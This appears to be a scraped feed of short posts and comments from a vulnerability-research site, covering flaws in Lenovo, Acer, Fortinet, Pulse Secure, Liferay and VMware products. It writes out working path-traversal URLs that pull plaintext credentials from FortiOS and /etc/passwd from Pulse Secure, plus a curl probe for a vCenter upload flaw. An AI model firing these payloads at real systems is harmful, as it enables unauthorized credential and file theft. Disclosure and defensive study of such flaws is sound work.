Recent Vulmon Research Posts

Lenovo Commercial Vantage Tool Local Privilege Escalation:

Would this work for my hacked Google account so I can gain access

If you are looking for the Samba vulnerability click the link below:

Acer ships most of the laptop it sells with a software suite called Care Center Service installed. In versions up to 4.00.3034 included, one of the suite’s programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from a phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. Blogpost:

Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already got the machine. How can it be a vulnerability?

POC of Liferay Portal RCE:

A fake CVE. Source:

VMware vCenter Server file upload vulnerability POC If below command response with anything other than 404, the application is vulnerable: curl -X POST "http://HOST:PORT/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP